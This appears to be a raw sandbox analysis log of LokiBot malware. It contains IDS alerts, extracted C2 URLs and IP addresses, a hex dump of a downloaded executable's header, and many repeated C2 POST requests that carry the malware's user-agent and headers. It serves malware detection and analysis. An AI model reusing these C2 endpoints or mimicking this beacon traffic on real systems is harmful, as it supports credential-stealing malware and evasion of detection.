            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58495 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58683 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58613 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58683 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58553
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58715 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58675
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58683
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58736 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58708 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58736 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58606
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58629 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49756 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58497 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58650 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58613 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58736 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49756 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58708 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49756 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58708
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49756
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58600
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58736 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58736 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58582
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58594
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58495 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58736
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58497 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58629
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58657 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58650
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58715 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58657 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58613
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58701 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58536
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58657 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58764 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58764 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58701 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58764 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58670 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58497
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58752 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58764 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58670 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58657 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58752 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58764 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58752 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58786 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58752 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58786 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58715 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58670 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58502 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58715 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58786 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58657 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58635
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58502 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58657
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58715 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58786 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58641 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58799 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58799 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58799 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58752 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58502 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58786 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58641 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58799 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58799 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58701
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58641 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58786
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58495
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58818 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58715
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58723 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58723 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58777 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58502 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58670 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58502 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58812 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58670 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58812 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58723 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58799
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58764
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58812 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58837 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58833 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58837 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58792 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58833 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58792 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58792 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58830 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58829 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58502
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58818 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58838 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58834 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58723 -> 94.156.177.41:80
            Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
            Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
            Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
            Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
            Source: Malware configuration extractorURLs: 94.156.177.41/maxzi/five/fre.php
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Nov 2024 09:57:05 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Wed, 20 Nov 2024 01:27:09 GMTETag: "92a00-6274e0c657f44"Accept-Ranges: bytesContent-Length: 600576Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed 3a 3d 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 08 09 00 00 20 00 00 00 00 00 00 e6 26 09 00 00 20 00 00 00 40 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 09 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 26 09 00 4f 00 00 00 00 40 09 00 7c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ec 06 09 00 00 20 00 00 00 08 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 7c 1d 00 00 00 40 09 00 00 1e 00 00 00 0a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 09 00 00 02 00 00 00 28 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 26 09 00 00 00 00 00 48 00 00 00 02 00 05 00 a8 36 00 00 0c 28 00 00 03 00 00 00 16 00 00 06 b4 5e 00 00 e0 c7 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c2 02 28 14 00 00 0a 02 03 7d 01 00 00 04 02 7b 01 00 00 04 72 01 00 00 70 20 d1 01 00 00 17 6f 35 00 00 06 02 7b 01 00 00 04 6f 37 00 00 06 26 2a 00 00 00 1b 30 03 00 1f 00 00 00 01 00 00 11 02 7b 01 00 00 04 03 04 6f 39 00 00 06 02 03 7d 02 00 00 04 17 0a de 05 26 16 0a de 00 06 2a 00 01 10 00 00 00 00 00 00 18 18 00 05 0a 00 00 02 1b 30 03 00 74 00 00 00 02 00 00 11 05 6f 15 00 00 0a 02 7b 01 00 00 04 02 7b 02 00 00 04 72 1f 00 00 70 28 16 00 00 0a 6f 3a 00 00 06 03 0a 16 0b 2b 25 06 07 9a 0c 02 7b 01 00 00 04 08 6f 17 00 00 0a 6f 3b 00 00 06 05 08 6f 18 00 00 0a de 03 26 de 00 07 17 58 0b 07 06 8e 69 32 d5 02 7b 01 00 00 04 04 6f 3c 00 00 06 17 0d de 10 26 02 7b 01 00 00 04 6f 3d 00 00 06 16 0d de 00 09 2a 01 1c 00 00 00 00 2b 00 1a 45 00 03 0a 00 00 02 00 00 06 00 5c 62 00 10 0a 00 00 02 32 02 7b 01 00 00 04 6f 41 00 00 06 2a 6e 02 28 19 00 00 0a 02 03 7d 03 00 00 04 02
            Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
            Source: Joe Sandbox ViewASN Name: NET1-ASBG NET1-ASBG
            Source: global trafficHTTP traffic detected: GET /33/caspol.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 66.63.187.231Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 176Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 176Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
